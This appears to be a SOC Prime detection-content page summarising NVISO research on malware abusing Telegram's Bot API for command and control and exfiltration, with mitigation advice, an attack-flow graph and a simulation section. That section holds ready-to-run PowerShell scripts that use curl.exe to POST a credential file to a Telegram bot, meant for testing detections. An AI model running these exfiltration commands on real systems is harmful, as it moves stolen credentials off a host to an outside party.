SOC Prime Bias: Medium

17 Dec 2025 17:33
newspaper icon NVISO Labs

The Detection & Response Chronicles: Exploring Telegram Abuse

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
The Detection & Response Chronicles: Exploring Telegram Abuse
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

The article explains how several threat actors misuse Telegram’s Bot API and channels in enterprises for command and control, data exfiltration, and victim monitoring. Malware families including DeerStealer, Lumma Stealer, Raven Stealer, and a trojanized XWorm builder hard-code bot tokens or channel IDs and call endpoints such as /sendMessage and /sendDocument. It includes Microsoft Defender and Sentinel detection queries focused on suspicious process command lines and traffic to api.telegram.org. Key guidance is to baseline legitimate Telegram use and block the API where it isn’t needed.

Investigation

NVISO’s SOC reported four intrusion attempts observed across October 2025 and March 2025 where Telegram was used at different points in the attack lifecycle. The write-up highlights campaigns such as Lunar Spider monitoring victims via fake captcha lures, DeerStealer sending operator notifications through curl, Lumma Stealer pulling C2 details from Telegram channels, Raven Stealer exfiltrating archived collections, and an XWorm builder relying on the Bot API for both exfiltration and C2. Analysts extracted indicators including process command lines, network destinations, and relevant file names.

Mitigation

Establish a baseline for legitimate Telegram usage, then block outbound access to api.telegram.org in environments where it is not required. Watch for uncommon processes (e.g., curl, powershell, wscript) initiating connections to the API and investigate any scripted Bot API interactions. Tune detections to suppress expected behavior such as known browsers launching telegram.exe, and prioritize long-polling or webhook-style requests originating from suspicious binaries or unexpected hosts.

Response

When activity is detected, isolate the affected endpoint, stop suspicious processes, and preserve command-line arguments along with DNS, proxy, and network telemetry. Perform deeper forensics to identify follow-on payloads associated with campaigns like DeerStealer or Raven Stealer. Rotate any exposed bot tokens, disable or revoke abused Telegram channels, and contain the spread by blocking related indicators. If abuse is confirmed, escalate reporting through Telegram’s official channels and document the incident for recurrence prevention.

graph TB %% Class definitions classDef technique fill:#ffcc99 classDef tool fill:#c2f0c2 classDef process fill:#c2d6f0 classDef malware fill:#f9c2ff classDef operator fill:#ff9900 %% Nodes – Techniques attack_user_execution[“<b>Technique</b> – <b>T1204 User Execution</b>: Victims are tricked into running a malicious executable bundled in a fake Google Chrome update.”] class attack_user_execution technique attack_software_extensions[“<b>Technique</b> – <b>T1176 Software Extensions</b>: A compromised WordPress plugin injects malicious iframes to deliver the fake update.”] class attack_software_extensions technique action_archive_data[“<b>Technique</b> – <b>T1560.001 Archive via Utility</b>: PowerShell archives harvested files into a ZIP archive.”] class action_archive_data technique tech_compression[“<b>Technique</b> – <b>T1027.015 Compression</b>: ZIP archive compresses data to reduce size for exfiltration.”] class tech_compression technique process_powershell[“<b>Process</b> – <b>T1059.001 PowerShell</b>: Executes archiving and later invokes curl for transmission.”] class process_powershell process action_curl[“<b>Action</b> – Curl: PowerShell calls curl to send the archive to the C2 server.”] class action_curl tool tech_dead_drop[“<b>Technique</b> – <b>T1102.001 Dead Drop Resolver</b>: Malware communicates with Telegram Bot API endpoints.”] class tech_dead_drop technique tech_messaging_exfil[“<b>Technique</b> – <b>T1213.005 Messaging Applications</b>: System information and credentials are exfiltrated via Telegram chats/bots.”] class tech_messaging_exfil technique tech_unsecured_creds[“<b>Technique</b> – <b>T1552.008 Unsecured Credentials</b>: Discord tokens and saved passwords are sent as chat messages.”] class tech_unsecured_creds technique tech_data_obfusc[“<b>Technique</b> – <b>T1001 Data Obfuscation</b>: Telegram channel names are encrypted with ROT13/ROT15.”] class tech_data_obfusc technique tech_dynamic_resolution[“<b>Technique</b> – <b>T1568 Dynamic Resolution</b>: Malware decodes the obfuscated identifier at runtime.”] class tech_dynamic_resolution technique tech_exfil_c2[“<b>Technique</b> – <b>T1041 Exfiltration Over C2 Channel</b>: Compressed archive and stolen data are sent over the Telegram channel.”] class tech_exfil_c2 technique %% Nodes – Tools / Malware tool_fake_update[“<b>Malware</b> – Fake Chrome Update: Malicious executable delivered to victims.”] class tool_fake_update malware tool_wordpress_plugin[“<b>Tool</b> – WordPress Plugin <i>header-fix-tester</i>: Injects malicious iframes.”] class tool_wordpress_plugin tool %% Operator nodes (optional) op_and1((“AND”)) class op_and1 operator %% Connections – Attack Flow attack_user_execution –>|delivers| tool_fake_update attack_software_extensions –>|injects iframe to deliver| tool_fake_update tool_fake_update –>|executes via| process_powershell process_powershell –>|creates| action_archive_data action_archive_data –>|applies| tech_compression tech_compression –>|produces archive for| action_curl action_curl –>|sends data to| tech_dead_drop tech_dead_drop –>|enables| tech_messaging_exfil tech_messaging_exfil –>|carries| tech_unsecured_creds tech_unsecured_creds –>|uses| tech_data_obfusc tech_data_obfusc –>|supports| tech_dynamic_resolution tech_dynamic_resolution –>|facilitates| tech_exfil_c2 tech_exfil_c2 –>|exfiltrates data over| tech_dead_drop %% Class assignments class tool_fake_update malware class tool_wordpress_plugin tool class op_and1 operator

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An adversary with a compromised Windows host wishes to exfiltrate a harvested credential file (creds.txt) to a Telegram bot they control. To avoid storing a custom binary, they use the native curl.exe (installed via Windows 10 optional features) to POST the file to https://api.telegram.org/bot<ATTACKER_TOKEN>/sendDocument. The command is executed from PowerShell, ensuring the process creation event records a command line that contains “api.telegram.org”. Because the process is curl.exe, the rule’s filter (InitiatingProcessFileName: "telegram.exe") does not suppress the alert.

    # Variables (replace with attacker-controlled values)
$BotToken = "123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11"
$ChatID   = "987654321"
$FilePath = "C:Tempcreds.txt"

# Ensure the file exists (simulated credential dump)
Set-Content -Path $FilePath -Value "username: admin`npassword: P@ssw0rd!"

# Execute the exfiltration via Telegram Bot API
$Url = "https://api.telegram.org/bot$BotToken/sendDocument?chat_id=$ChatID"
curl.exe -X POST -F "document=@$FilePath" $Url

  • Regression Test Script: The script below reproduces the exact steps, suitable for automated BAS runs.

    #--------------------------------------------
# Regression Test – Telegram API Exfiltration
#--------------------------------------------
param(
    [string]$BotToken = "REPLACE_WITH_TOKEN",
    [string]$ChatID   = "REPLACE_WITH_CHATID",
    [string]$TmpDir   = "$env:TEMPTelegramBAS"
)

# Create temp workspace
New-Item -ItemType Directory -Path $TmpDir -Force | Out-Null

# Simulated credential file
$CredFile = Join-Path $TmpDir "creds.txt"
"username: admin`npassword: P@ssw0rd!" | Set-Content -Path $CredFile

# Build API URL
$Url = "https://api.telegram.org/bot$BotToken/sendDocument?chat_id=$ChatID"

# Invoke exfiltration
Write-Host "[*] Exfiltrating $CredFile to Telegram..."
curl.exe -X POST -F "document=@$CredFile" $Url

# Simple success indicator (does not verify delivery)
if ($LASTEXITCODE -eq 0) {
    Write-Host "[+] Exfiltration command executed."
} else {
    Write-Error "[-] Exfiltration failed."
}

  • Cleanup Commands: Remove the temporary file and directory; optionally terminate any lingering curl.exe processes.

    # Cleanup temporary artifacts
Stop-Process -Name "curl" -ErrorAction SilentlyContinue
Remove-Item -Path $TmpDir -Recurse -Force
Write-Host "[*] Cleanup complete."

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free